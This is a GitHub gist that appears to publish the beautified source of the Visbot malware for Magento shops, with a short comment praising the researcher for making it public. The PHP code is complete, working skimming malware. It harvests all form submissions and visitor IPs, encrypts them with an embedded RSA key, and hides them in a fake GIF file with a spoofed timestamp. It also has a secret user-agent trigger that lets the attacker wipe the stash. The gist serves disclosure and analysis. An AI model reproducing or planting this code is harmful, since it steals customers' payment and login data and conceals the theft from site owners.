visbot-beautified.php
<?PHP | |
$y0 = '/var/www/vhosts/redacted.nl/httpdocs/skin/adminhtml/default/default/images/left_button_back.gif'; | |
$m1 = '1382961301'; | |
$k2 = 'pa89785e'; | |
$k3 = "-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----"; | |
if (@$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)') { | |
if (isset($_GET[$k2])) { | |
$m1 = file_exists($y0) ? @filemtime($y0) : $m1; | |
@file_put_contents($y0, ''); | |
@touch($y0, $m1, $m1); | |
echo 'clean ok'; | |
} else | |
echo 'Pong'; | |
exit; | |
} | |
if (!empty($_SERVER['HTTP_CLIENT_IP'])) { | |
$i4 = $_SERVER['HTTP_CLIENT_IP']; | |
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { | |
$i4 = $_SERVER['HTTP_X_FORWARDED_FOR']; | |
} else { | |
$i4 = @$_SERVER['REMOTE_ADDR']; | |
} | |
if (isset($_POST) && sizeof($_POST)) { | |
$a5 = ''; | |
foreach ($_POST as $h6 => $n7) { | |
if (is_array($n7)) { | |
foreach ($n7 as $f8 => $l9) { | |
if (is_array($l9)) { | |
foreach ($l9 as $l10 => $v11) { | |
if (is_array($v11)) { | |
; | |
} else { | |
$a5 .= ':' . $h6 . '[' . $f8 . '][' . $l10 . ']=' . $v11; | |
} | |
} | |
} else { | |
$a5 .= ':' . $h6 . '[' . $f8 . ']=' . $l9; | |
} | |
} | |
} else { | |
$a5 .= ':' . $h6 . '=' . $n7; | |
} | |
} | |
$a5 = $i4 . $a5; | |
} else { | |
$a5 = null; | |
} | |
if ($a5) { | |
$t12 = false; | |
if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists('openssl_encrypt')) { | |
$t12 = true; | |
} elseif (function_exists('dl')) { | |
$n13 = strtolower(substr(php_uname(), 0, 3)); | |
$d14 = 'php_openssl.' . ($n13 == 'win' ? 'dll' : 'so'); | |
@dl($d14); | |
if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists('openssl_encrypt')) { | |
$t12 = true; | |
} | |
} | |
if ($t12) { | |
$t15 = @openssl_get_publickey($k3); | |
$q16 = 128; | |
$t17 = ''; | |
$h18 = md5(md5(microtime()) . rand()); | |
$e19 = $h18; | |
while ($e19) { | |
$f20 = substr($e19, 0, $q16); | |
$e19 = substr($e19, $q16); | |
@openssl_public_encrypt($f20, $h21, $t15); | |
$t17 .= $h21; | |
} | |
$t22 = @openssl_encrypt($a5, 'aes128', $h18); | |
@openssl_free_key($t15); | |
$a5 = $t17 . ':::SEP:::' . $t22; | |
} | |
$m1 = file_exists($y0) ? @filemtime($y0) : $m1; | |
@file_put_contents($y0, 'JPEG-1.1' . base64_encode($a5), FILE_APPEND); | |
@touch($y0, $m1, $m1); | |
} | |
?><?php |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
invalidquery commentedDec 2, 2016
Thank you for publicizing this Willem, keep up the great research work!